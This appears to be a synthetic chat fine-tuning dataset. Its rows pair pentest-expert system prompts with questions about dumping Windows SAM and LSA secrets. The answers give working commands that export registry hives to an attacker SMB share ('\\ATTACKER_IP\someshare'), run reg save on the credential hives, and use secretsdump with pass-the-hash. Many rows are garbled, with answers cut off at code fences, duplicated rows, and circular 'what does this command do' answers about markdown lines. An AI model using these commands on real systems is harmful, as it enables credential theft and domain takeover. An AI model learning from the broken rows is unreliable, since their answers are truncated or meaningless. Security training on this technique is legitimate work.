-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Plaintext passwords | credential spraying, stuffing, shuffling or silver tickets |\n| LM and NT hashes | credential spraying, stuffing, shuffling, cracking, pass-the-hash |\n| Kerberos keys (RC4, i.e. == NT hash) | credential cracking, overpass-the-hash or silver tickets |\n| Kerberos keys (DES, AES) | credential cracking, pass-the-key or silver tickets |\n| Domain Cached Credentials (DCC1 or DCC2) | credential cracking |", "metadata": {"corpus_index": 350, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through SAM & LSA secrets - Theory"}, {"role": "assistant", "content": "In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.\n\n| Hive | Details | Format or credential material |\n| -------- | -------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| SAM | stores locally cached credentials (referred to as SAM secrets) | LM or NT hashes |\n| SECURITY | stores domain cached credentials (referred to as LSA secrets) | Plaintext passwords, LM or NT hashes, Kerberos keys (DES, AES), Domain Cached Credentials (DCC1 and DCC2), Security Questions (L$SQSA), |\n| SYSTEM | contains enough info to decrypt SAM secrets and LSA secrets | N/A |\n\nSAM and LSA secrets can be dumped either locally or remotely from the mounted registry hives. These secrets can also be extracted offline from the exported hives. Once the secrets are extracted, they can be used for various attacks, depending on the credential format.\n\n| Credential material | Subsequent attacks |\n| ---------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Plaintext passwords | credential spraying, stuffing, shuffling or silver tickets |\n| LM and NT hashes | credential spraying, stuffing, shuffling, cracking, pass-the-hash |\n| Kerberos keys (RC4, i.e. == NT hash) | credential cracking, overpass-the-hash or silver tickets |\n| Kerberos keys (DES, AES) | credential cracking, pass-the-key or silver tickets |\n| Domain Cached Credentials (DCC1 or DCC2) | credential cracking |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through SAM & LSA secrets - Theory", "response": "In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.\n\n| Hive | Details | Format or credential material |\n| -------- | -------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| SAM | stores locally cached credentials (referred to as SAM secrets) | LM or NT hashes |\n| SECURITY | stores domain cached credentials (referred to as LSA secrets) | Plaintext passwords, LM or NT hashes, Kerberos keys (DES, AES), Domain Cached Credentials (DCC1 and DCC2), Security Questions (L$SQSA), |\n| SYSTEM | contains enough info to decrypt SAM secrets and LSA secrets | N/A |\n\nSAM and LSA secrets can be dumped either locally or remotely from the mounted registry hives. These secrets can also be extracted offline from the exported hives. Once the secrets are extracted, they can be used for various attacks, depending on the credential format.\n\n| Credential material | Subsequent attacks |\n| ---------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Plaintext passwords | credential spraying, stuffing, shuffling or silver tickets |\n| LM and NT hashes | credential spraying, stuffing, shuffling, cracking, pass-the-hash |\n| Kerberos keys (RC4, i.e. == NT hash) | credential cracking, overpass-the-hash or silver tickets |\n| Kerberos keys (DES, AES) | credential cracking, pass-the-key or silver tickets |\n| Domain Cached Credentials (DCC1 or DCC2) | credential cracking |", "metadata": {"corpus_index": 350, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does SAM & LSA secrets - Exfiltration work?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nImpacket's reg.py (Python) script can also be used to do the same operation remotely for a UNIX-like machine. For instance, this can be used to easily escalate from a Backup Operator member to a Domain Admin by dumping a Domain Controller's secrets and use them for a DCSync.\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does SAM & LSA secrets - Exfiltration work?", "response": "::: tabs\n\n=== UNIX-like\n\nImpacket's reg.py (Python) script can also be used to do the same operation remotely for a UNIX-like machine. For instance, this can be used to easily escalate from a Backup Operator member to a Domain Admin by dumping a Domain Controller's secrets and use them for a DCSync.\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.\n\n```bash", "metadata": {"corpus_index": 351, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out SAM & LSA secrets - Exfiltration during a pentest?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nImpacket's reg.py (Python) script can also be used to do the same operation remotely for a UNIX-like machine. For instance, this can be used to easily escalate from a Backup Operator member to a Domain Admin by dumping a Domain Controller's secrets and use them for a DCSync.\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out SAM & LSA secrets - Exfiltration during a pentest?", "response": "::: tabs\n\n=== UNIX-like\n\nImpacket's reg.py (Python) script can also be used to do the same operation remotely for a UNIX-like machine. For instance, this can be used to easily escalate from a Backup Operator member to a Domain Admin by dumping a Domain Controller's secrets and use them for a DCSync.\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.\n\n```bash", "metadata": {"corpus_index": 351, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain save each hive manually"}, {"role": "assistant", "content": "reg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SAM' -o '\\\\ATTACKER_IPs\\someshare'\nreg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SYSTEM' -o '\\\\ATTACKER_IP\\someshare'\nreg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SECURITY' -o '\\\\ATTACKER_IP\\someshare'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain save each hive manually", "response": "reg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SAM' -o '\\\\ATTACKER_IPs\\someshare'\nreg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SYSTEM' -o '\\\\ATTACKER_IP\\someshare'\nreg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SECURITY' -o '\\\\ATTACKER_IP\\someshare'", "metadata": {"corpus_index": 352, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out save each hive manually during a pentest?"}, {"role": "assistant", "content": "reg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SAM' -o '\\\\ATTACKER_IPs\\someshare'\nreg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SYSTEM' -o '\\\\ATTACKER_IP\\someshare'\nreg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SECURITY' -o '\\\\ATTACKER_IP\\someshare'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out save each hive manually during a pentest?", "response": "reg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SAM' -o '\\\\ATTACKER_IPs\\someshare'\nreg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SYSTEM' -o '\\\\ATTACKER_IP\\someshare'\nreg.py \"domain\"/\"user\":\"password\"@\"target\" save -keyName 'HKLM\\SECURITY' -o '\\\\ATTACKER_IP\\someshare'", "metadata": {"corpus_index": 352, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about backup all SAM, SYSTEM and SECURITY hives at once?"}, {"role": "assistant", "content": "reg.py \"domain\"/\"user\":\"password\"@\"target\" backup -o '\\\\ATTACKER_IP\\someshare'\n``\n\n=== Live Windows\n\nWhen the Windows operating system is running, the hives are in use and mounted. The command-line tool named reg can be used to export them.\n\n`bash\nreg save HKLM\\SAM \"C:\\Windows\\Temp\\sam.save\"\nreg save HKLM\\SECURITY \"C:\\Windows\\Temp\\security.save\"\nreg save HKLM\\SYSTEM \"C:\\Windows\\Temp\\system.save\"\n`\n\nThis operation can be conducted remotely with BackupOperatoToDA (C++).\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.\n\n`bash\nBackupOperatorToDA.exe -d \"domain\" -u \"user\" -p \"password\" -t \"target\" -o \"\\\\ATTACKER_IP\\someshare\"\n`\n\n> [!TIP]\n> Alternatively, from a live Windows machine, the hive files can also be exfiltrated using Volume Shadow Copy like demonstrated for an NTDS export.\n\n=== Down Windows\n\nWhen Windows is not running, the hives are not mounted and they can be copied just like any other file. This can be operated when mounting the hard drive from another OS (e.g. when booting the computer on another operating system). The hive files can be found at the following locations.\n\n`bash\n\\system32\\config\\sam\n\\system32\\config\\security\n\\system32\\config\\system\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about backup all SAM, SYSTEM and SECURITY hives at once?", "response": "reg.py \"domain\"/\"user\":\"password\"@\"target\" backup -o '\\\\ATTACKER_IP\\someshare'\n``\n\n=== Live Windows\n\nWhen the Windows operating system is running, the hives are in use and mounted. The command-line tool named reg can be used to export them.\n\n`bash\nreg save HKLM\\SAM \"C:\\Windows\\Temp\\sam.save\"\nreg save HKLM\\SECURITY \"C:\\Windows\\Temp\\security.save\"\nreg save HKLM\\SYSTEM \"C:\\Windows\\Temp\\system.save\"\n`\n\nThis operation can be conducted remotely with BackupOperatoToDA (C++).\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.\n\n`bash\nBackupOperatorToDA.exe -d \"domain\" -u \"user\" -p \"password\" -t \"target\" -o \"\\\\ATTACKER_IP\\someshare\"\n`\n\n> [!TIP]\n> Alternatively, from a live Windows machine, the hive files can also be exfiltrated using Volume Shadow Copy like demonstrated for an NTDS export.\n\n=== Down Windows\n\nWhen Windows is not running, the hives are not mounted and they can be copied just like any other file. This can be operated when mounting the hard drive from another OS (e.g. when booting the computer on another operating system). The hive files can be found at the following locations.\n\n`bash\n\\system32\\config\\sam\n\\system32\\config\\security\n\\system32\\config\\system\n``\n\n:::", "metadata": {"corpus_index": 353, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on backup all SAM, SYSTEM and SECURITY hives at once"}, {"role": "assistant", "content": "reg.py \"domain\"/\"user\":\"password\"@\"target\" backup -o '\\\\ATTACKER_IP\\someshare'\n``\n\n=== Live Windows\n\nWhen the Windows operating system is running, the hives are in use and mounted. The command-line tool named reg can be used to export them.\n\n`bash\nreg save HKLM\\SAM \"C:\\Windows\\Temp\\sam.save\"\nreg save HKLM\\SECURITY \"C:\\Windows\\Temp\\security.save\"\nreg save HKLM\\SYSTEM \"C:\\Windows\\Temp\\system.save\"\n`\n\nThis operation can be conducted remotely with BackupOperatoToDA (C++).\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.\n\n`bash\nBackupOperatorToDA.exe -d \"domain\" -u \"user\" -p \"password\" -t \"target\" -o \"\\\\ATTACKER_IP\\someshare\"\n`\n\n> [!TIP]\n> Alternatively, from a live Windows machine, the hive files can also be exfiltrated using Volume Shadow Copy like demonstrated for an NTDS export.\n\n=== Down Windows\n\nWhen Windows is not running, the hives are not mounted and they can be copied just like any other file. This can be operated when mounting the hard drive from another OS (e.g. when booting the computer on another operating system). The hive files can be found at the following locations.\n\n`bash\n\\system32\\config\\sam\n\\system32\\config\\security\n\\system32\\config\\system\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on backup all SAM, SYSTEM and SECURITY hives at once", "response": "reg.py \"domain\"/\"user\":\"password\"@\"target\" backup -o '\\\\ATTACKER_IP\\someshare'\n``\n\n=== Live Windows\n\nWhen the Windows operating system is running, the hives are in use and mounted. The command-line tool named reg can be used to export them.\n\n`bash\nreg save HKLM\\SAM \"C:\\Windows\\Temp\\sam.save\"\nreg save HKLM\\SECURITY \"C:\\Windows\\Temp\\security.save\"\nreg save HKLM\\SYSTEM \"C:\\Windows\\Temp\\system.save\"\n`\n\nThis operation can be conducted remotely with BackupOperatoToDA (C++).\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.\n\n`bash\nBackupOperatorToDA.exe -d \"domain\" -u \"user\" -p \"password\" -t \"target\" -o \"\\\\ATTACKER_IP\\someshare\"\n`\n\n> [!TIP]\n> Alternatively, from a live Windows machine, the hive files can also be exfiltrated using Volume Shadow Copy like demonstrated for an NTDS export.\n\n=== Down Windows\n\nWhen Windows is not running, the hives are not mounted and they can be copied just like any other file. This can be operated when mounting the hard drive from another OS (e.g. when booting the computer on another operating system). The hive files can be found at the following locations.\n\n`bash\n\\system32\\config\\sam\n\\system32\\config\\security\n\\system32\\config\\system\n``\n\n:::", "metadata": {"corpus_index": 353, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for backup all SAM, SYSTEM and SECURITY hives at once"}, {"role": "assistant", "content": "=== Live Windows\n\nWhen the Windows operating system is running, the hives are in use and mounted. The command-line tool named `reg` can be used to export them."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for backup all SAM, SYSTEM and SECURITY hives at once", "response": "=== Live Windows\n\nWhen the Windows operating system is running, the hives are in use and mounted. The command-line tool named `reg` can be used to export them.", "metadata": {"corpus_index": 354, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Live Windows`?"}, {"role": "assistant", "content": "This command is used for backup all sam, system and security hives at once. backup all SAM, SYSTEM and SECURITY hives at once"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Live Windows`?", "response": "This command is used for backup all sam, system and security hives at once. backup all SAM, SYSTEM and SECURITY hives at once", "metadata": {"corpus_index": 354, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use This for backup all sam, system and security hives at once?"}, {"role": "assistant", "content": "This operation can be conducted remotely with [BackupOperatoToDA](https://github.com/mpgn/BackupOperatorToDA) (C++).\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use This for backup all sam, system and security hives at once?", "response": "This operation can be conducted remotely with [BackupOperatoToDA](https://github.com/mpgn/BackupOperatorToDA) (C++).\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.", "metadata": {"corpus_index": 355, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "This"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out backup all SAM, SYSTEM and SECURITY hives at once during a pentest?"}, {"role": "assistant", "content": "This operation can be conducted remotely with [BackupOperatoToDA](https://github.com/mpgn/BackupOperatorToDA) (C++).\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out backup all SAM, SYSTEM and SECURITY hives at once during a pentest?", "response": "This operation can be conducted remotely with [BackupOperatoToDA](https://github.com/mpgn/BackupOperatorToDA) (C++).\n\n> [!TIP]\n> The attacker can start an SMB server, and indicate an UNC path including his IP address so that the hives get exported directly to his server.", "metadata": {"corpus_index": 355, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `This operation can be conducted remotely with [BackupOperatoToDA](https://github.com/mpgn/BackupOperatorToDA) (C++).`?"}, {"role": "assistant", "content": "This command is used for backup all sam, system and security hives at once. backup all SAM, SYSTEM and SECURITY hives at once"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `This operation can be conducted remotely with [BackupOperatoToDA](https://github.com/mpgn/BackupOperatorToDA) (C++).`?", "response": "This command is used for backup all sam, system and security hives at once. backup all SAM, SYSTEM and SECURITY hives at once", "metadata": {"corpus_index": 355, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for backup all SAM, SYSTEM and SECURITY hives at once"}, {"role": "assistant", "content": "> [!TIP]\n> Alternatively, from a live Windows machine, the hive files can also be exfiltrated using [Volume Shadow Copy](ntds.md#volume-shadow-copy-vssadmin) like demonstrated for an NTDS export.\n\n\n=== Down Windows\n\nWhen Windows is not running, the hives are not mounted and they can be copied just like any other file. This can be operated when mounting the hard drive from another OS (e.g. when booting the computer on another operating system). The hive files can be found at the following locations."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for backup all SAM, SYSTEM and SECURITY hives at once", "response": "> [!TIP]\n> Alternatively, from a live Windows machine, the hive files can also be exfiltrated using [Volume Shadow Copy](ntds.md#volume-shadow-copy-vssadmin) like demonstrated for an NTDS export.\n\n\n=== Down Windows\n\nWhen Windows is not running, the hives are not mounted and they can be copied just like any other file. This can be operated when mounting the hard drive from another OS (e.g. when booting the computer on another operating system). The hive files can be found at the following locations.", "metadata": {"corpus_index": 356, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for backup all sam, system and security hives at once. backup all SAM, SYSTEM and SECURITY hives at once"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for backup all sam, system and security hives at once. backup all SAM, SYSTEM and SECURITY hives at once", "metadata": {"corpus_index": 356, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain SAM & LSA secrets - Secrets dump"}, {"role": "assistant", "content": "Here are some examples and tools that can be used for local/remote/offline dumping.\n\n::: tabs\n\n=== secretsdump\n\nImpacket's secretsdump (Python) can be used to dump SAM and LSA secrets, either remotely, or from local files. For remote dumping, several authentication methods can be used like pass-the-hash (LM/NTLM), or pass-the-ticket (Kerberos).\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain SAM & LSA secrets - Secrets dump", "response": "Here are some examples and tools that can be used for local/remote/offline dumping.\n\n::: tabs\n\n=== secretsdump\n\nImpacket's secretsdump (Python) can be used to dump SAM and LSA secrets, either remotely, or from local files. For remote dumping, several authentication methods can be used like pass-the-hash (LM/NTLM), or pass-the-ticket (Kerberos).\n\n```bash", "metadata": {"corpus_index": 357, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out SAM & LSA secrets - Secrets dump during a pentest?"}, {"role": "assistant", "content": "Here are some examples and tools that can be used for local/remote/offline dumping.\n\n::: tabs\n\n=== secretsdump\n\nImpacket's secretsdump (Python) can be used to dump SAM and LSA secrets, either remotely, or from local files. For remote dumping, several authentication methods can be used like pass-the-hash (LM/NTLM), or pass-the-ticket (Kerberos).\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out SAM & LSA secrets - Secrets dump during a pentest?", "response": "Here are some examples and tools that can be used for local/remote/offline dumping.\n\n::: tabs\n\n=== secretsdump\n\nImpacket's secretsdump (Python) can be used to dump SAM and LSA secrets, either remotely, or from local files. For remote dumping, several authentication methods can be used like pass-the-hash (LM/NTLM), or pass-the-ticket (Kerberos).\n\n```bash", "metadata": {"corpus_index": 357, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Remote dumping of SAM & LSA secrets (pass-the-hash)"}, {"role": "assistant", "content": "secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Remote dumping of SAM & LSA secrets (pass-the-hash)", "response": "secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'", "metadata": {"corpus_index": 358, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Remote dumping of SAM & LSA secrets (pass-the-hash)"}, {"role": "assistant", "content": "secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Remote dumping of SAM & LSA secrets (pass-the-hash)", "response": "secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'", "metadata": {"corpus_index": 358, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Offline dumping of LSA secrets from exported hives"}, {"role": "assistant", "content": "secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Offline dumping of LSA secrets from exported hives", "response": "secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL", "metadata": {"corpus_index": 359, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/sam-and-lsa-secrets.md", "page_title": "SAM & LSA secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Offline dumping of LSA secrets from exported hives"}, {"role": "assistant", "content": "secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Offline dumping of LSA secrets from exported hives", "response": "secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL", "metadata": {"corpus_index": 359, "category": "credentials", "source_file": 